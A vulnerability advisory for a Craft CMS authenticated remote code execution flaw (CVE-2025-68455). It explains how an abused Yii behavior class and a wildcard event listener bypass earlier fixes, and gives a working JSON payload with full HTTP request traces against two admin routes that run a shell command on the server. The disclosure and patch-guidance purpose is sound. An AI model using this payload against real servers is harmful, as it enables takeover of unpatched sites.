CVE-2025-68455
Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
描述
Note that attackers must have administrator access to the Craft Control Panel for this to work. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Resources: https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7 https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593 https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04 ### Summary This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (`5.6.0`) version of Craft CMS. Leveraging a legitimate but maliciously crafted Yii `Behavior` class, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted `Behavior` is attached to a Yii `Component`, and an event is also fired on the tainted `Component`. ### Details This vulnerability is inspired by `CVE-2024-4990` but differs because a legitimate Yii `Behavior` class is used to abuse the magic `__set()` and `__get()` methods to trigger an arbitrary PHP callable, ultimately leading to RCE. As such, this bypasses the mitigations implemented for `CVE-2024-4990` and the related `CVE-2024-58136`. Using the `as <behavior>` syntax in JSON POST input, it’s possible to [attach](https://www.yiiframework.com/doc/guide/2.0/en/concept-behaviors#attaching-behaviors) `Behavior` classes to Yii `Components`, which was the crux of the vulnerability identified in `CVE-2024-4990`. Fixes for that vulnerability and the related `CVE-2024-58136` ensured that only classes of type `Behavior` could be attached to a `Component`. Craft CMS also implemented additional logic to prevent arbitrary `Behavior` classes from being attached to the vulnerable `Component`. A new vulnerability has been identified that bypasses the fixes for the previous vulnerabilities by using a legitimate but specially crafted `Behavior` class, namely the `yii\behaviors\AttributeTypecastBehavior`. Attaching a `Behavior` of this type allows the attacker to define an arbitrary callable that is triggered if any event is fired on the tainted `Component`. Using a [wildcard](https://www.yiiframework.com/doc/guide/2.0/en/concept-events#wildcard-events) event listener (specified as `on *` in JSON input) allows the attacker to catch any event called on the tainted `Component` and redirect the flow of control to call `self::beforeSave` of the `AttributeTypecastBehavior`, triggering the attacker-defined callable and resulting in RCE. See the commented payload below: ```json { "as xxx": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] // Attacker defined callable }, "typecastBeforeSave": "touch /tmp/touch" // Argument for the callable } ] }, "on *": "self::beforeSave" // When any event is fired on the Component, call beforeSave() of the AttributeTypecastBehavior to trigger the attacker-defined callable with the argument above } ``` This was found to affect two separate controllers/routes in Craft CMS admin functionality, though others may be affected: * /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings * /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview ### PoC * Install Craft CMS via Composer: ``` $ composer create-project "craftcms/craft" app ``` * Use the built-in server to launch Craft CMS: ``` $ ./craft serve 127.0.0.1:9090 ``` * The following HTTP traces show the payload used to trigger the vulnerability on each of the vulnerable routes: **/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings** ``` POST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings&v=1763562868146 HTTP/1.1 Host: 127.0.0.1:9090 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1:9090/admin/settings/categories/new Content-Type: application/json X-Requested-With: XMLHttpRequest X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb X-Registered-Js-Files: X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B Content-Length: 1787 Origin: http://127.0.0.1:9090 Connection: keep-alive Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 {"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","layoutConfig":{"uid":"08ef66f3-f69e-495b-882f-56834efab200","tabs":[{"name":"Content","uid":"6f1efe1c-2de5-4783-ab39-7ff9149a9c90","userCondition":null,"elementCondition":null,"elements":[{"type":"craft\\fieldlayoutelements\\TitleField","inputType":null,"autocomplete":false,"class":null,"size":null,"name":null,"autocorrect":true,"autocapitalize":true,"disabled":false,"readonly":false,"title":null,"placeholder":null,"step":null,"min":null,"max":null,"requirable":false,"id":null,"containerAttributes":[],"inputContainerAttributes":[],"labelAttributes":[],"orientation":null,"label":null,"instructions":null,"tip":null,"warning":null,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":"2025-11-19T06:33:18-08:00","uid":"bae4dcd7-635b-41fe-96a3-4d3d69e91969","userCondition":null,"elementCondition":null},{"type":"craft\\fieldlayoutelements\\CustomField","handle":null,"label":null,"instructions":null,"tip":null,"warning":null,"required":false,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":null,"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","userCondition":null,"elementCondition":null,"fieldUid":"12ac060b-8c40-48a6-b70f-94361245b149","editCondition":null}]}],"generatedFields":[],"cardView":[],"cardThumbAlignment":"end","type":"craft\\elements\\Category"},"elementType":"craft\\elements\\Category","config":{ "as xxx": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] }, "typecastBeforeSave": "touch /tmp/touch111" } ] }, "on *": "self::beforeSave" },"settingsNamespace":null,"settings":null} ``` **/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview** ``` POST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview&v=1763562868148 HTTP/1.1 Host: 127.0.0.1:9090 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1:9090/admin/settings/categories/new Content-Type: application/json X-Requested-With: XMLHttpRequest X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb X-Registered-Js-Files: X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B Content-Length: 424 Origin: http://127.0.0.1:9090 Connection: keep-alive Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 {"fieldLayoutConfig":{ "as xxx": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] }, "typecastBeforeSave": "touch /tmp/touch222" } ] }, "on *": "self::beforeSave" },"cardElements":[],"showThumb":null,"thumbAlignment":"end"} ``` * Check the filesystem to confirm the creation of the two files in `/tmp` and hence confirm RCE: ``` $ ls -la /tmp/ ... -rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch111 -rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch222 ``` ### Impact An attacker with access to Craft CMS admin functionality, specifically the routes listed above, can trigger RCE on the backend server and potentially gain control of the server.